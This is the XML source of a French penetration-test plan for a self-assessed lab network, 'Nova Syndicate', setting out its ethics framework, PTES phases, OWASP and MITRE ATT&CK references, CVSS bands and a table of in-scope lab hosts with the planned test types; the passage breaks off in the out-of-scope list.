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plan-de-tests-dintrusion"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PLAN DE TESTS D’INTRUSION</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="10" w:name="self-pentest-mission-solo"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">(Self-Pentest — Mission Solo)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="9" w:name="client-nova-syndicate"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Client : Nova Syndicate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 document</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: NS-2026-007</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Auteur</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: [Nom] — Responsable Technique (Mission Consulting)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Mai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: 1.0 (plan d’exécution)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: Plan préparatoire — rapport final à produire post-tests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: Confidentiel – Diffusion restreinte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hyperlink w:anchor="X1518ed724c4baccf3c04fb58e5915c19ab5d7d6">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Objet et cadre</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="X7773217a84eaa8ef7048683214b79565a2aca32">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Méthodologie retenue</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="Xfcbc802dcf4d93218294df930d62641b392d9d7">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Périmètre des tests</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="Xe14ba12333e2570846c207dc5332ea874a5a2f8">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Boîte à outils</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="X1e2ebc51a3ab504140a5c9efc98354b715f1f94">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Scénarios d’attaque</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="Xbd567b9e4431c729a3c8466919ec09bbea14669">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Planning d’exécution</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="Xda677569825d480c30d53c99e625f60805e425c">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Format du rapport final</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="X5e64be3aac74c2ff3dc8cff7afcd0e3258b8af8">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Référentiels d’évaluation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objet-et-cadre"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. Objet et cadre</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="12" w:name="contexte"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.1 Contexte</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La mission Nova Syndicate étant menée en</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">solo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, le pentest sera réalisé en</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">mode auto-évaluation (self-pentest)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Cette posture, courante chez les éditeurs de logiciels et les équipes DevSecOps internes, consiste à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Simuler l’attaquant</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">depuis trois angles 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Externe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: depuis Internet (poste connecté sur le réseau WAN du lab).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Interne authentifié</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: depuis une session VPN d’un commercial légitime.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Interne compromis</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: depuis une VM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“compromise”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">simulée en VLAN USERS.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Documenter chaque vulnérabilité</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">identifiée selon le format</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">PTES</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">+ cotation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS v3.1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Proposer une remédiation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">chiffrée pour chaque finding.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="12"/>
    <w:bookmarkStart w:id="13" w:name="distinction-avec-un-pentest-tiers"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.2 Distinction avec un pentest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Pentest tiers (commandité)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Self-pentest (cette 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Indépendance forte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Indépendance limitée (biais auteur)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Coût élevé (5 000-15 000 €)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Coût nul (incluse dans la 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Crédibilité externe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Crédibilité limitée mais bonne foi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Recommandé annuel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Bonne pratique en complément</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">→ Pour Nova Syndicate, le self-pentest sera</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">complété</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">par un pentest tiers annuel recommandé (cf. Rapport Phase III §8.2).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="13"/>
    <w:bookmarkStart w:id="14" w:name="engagement-éthique"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.3 Engagement éthique</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tous les tests sont réalisés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Dans le laboratoire fermé</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Nova Syndicate (VirtualBox + Proxmox).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Sans impact</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sur des systèmes tiers.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Avec autorisation préalable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(l’auteur étant le commanditaire de fait dans ce contexte de mission solo).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Avec destruction des artefacts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">d’exploit après tests (clear-up phase PTES).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méthodologie-retenue"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Méthodologie retenue</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="16" w:name="Xb93d11af2bce3fcbbfcb2fd97b1aed3f0f49d0c"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1 Cadre PTES (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Penetration Testing Execution Standard</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Les tests suivent les</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">7 phases</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">du PTES :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Pre-engagement       (cadrage — déjà fait via ce document)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Intelligence Gathering (reconnaissance — Nmap, OSINT)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Threat Modeling      (modélisation — STRIDE déjà fait Phase I)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Vulnerability Analysis (analyse — Nessus, Wazuh vuln, manuel)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Exploitation         (exploit — Metasploit, manuel)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Post-Exploitation    (élévation, persistance, latéral)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Reporting            (rapport final)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="16"/>
    <w:bookmarkStart w:id="17" w:name="owasp-top-10-applicatif"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.2 OWASP Top 10 (applicatif)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pour les composants web (Web-01, Proxy-01, Nextcloud, Roundcube), application des</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">10 catégories OWASP Top 10 2021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A01 Broken Access Control</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A02 Cryptographic Failures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A03 Injection (SQL, OS, LDAP)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A04 Insecure Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A05 Security Misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A06 Vulnerable and Outdated Components</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A07 Identification and Authentication Failures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A08 Software and Data Integrity Failures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A09 Security Logging and Monitoring Failures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A10 Server-Side Request Forgery</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="17"/>
    <w:bookmarkStart w:id="18" w:name="mitre-attck"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.3 MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mapping des techniques d’attaque sur les</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">tactiques ATT&amp;CK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">pour permettre la corrélation avec les alertes Wazuh générées :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TA0001 Initial Access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TA0002 Execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TA0003 Persistence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TA0004 Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TA0005 Defense Evasion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TA0006 Credential Access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TA0007 Discovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TA0008 Lateral Movement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TA0009 Collection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TA0010 Exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TA0011 Command and Control</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="18"/>
    <w:bookmarkStart w:id="19" w:name="cotation-cvss-v3.1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.4 Cotation CVSS v3.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chaque vulnérabilité identifiée sera cotée selon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Sévérité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Action attendue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0.1 - 3.9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À surveiller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4.0 - 6.9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À corriger sous 30 jours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7.0 - 8.9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À corriger sous 7 jours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9.0 - 10.0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À corriger immédiatement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périmètre-des-tests"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Périmètre des tests</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="21" w:name="composants-dans-le-périmètre"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1 Composants dans le périmètre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23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Type de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OPNsense Lyon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">192.168.1.166 (WAN)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Reco port, fingerprint, recherche CVE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OPNsense Marseille</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">192.168.1.167 (WAN)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Bastion-01 (post-NAT)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">192.168.1.166:2222</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Brute force SSH, énumération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Web-01 + Proxy-01 (post-NAT)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">192.168.1.166:443</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">OWASP Top 10, scan vulnérabilités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Mail-01 SMTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">192.168.1.166:25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Open relay, AUTH brute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DC01-Lyon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">10.1.10.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Énumération AD, Kerberoasting (depuis VPN)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Wazuh-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">10.1.10.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Endpoint sécurité, manager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DB-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">10.1.10.30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SQL injection, énumération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File-01 (Nextcloud)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">10.1.10.40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Tests Nextcloud spécifiques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Honeypot-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">10.1.5.40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Vérification capacité de leurre</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="21"/>
    <w:bookmarkStart w:id="22" w:name="composants-hors-périmètre"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2 Composants hors périmètre</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’hôte VirtualBox lui-même (hors scope).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
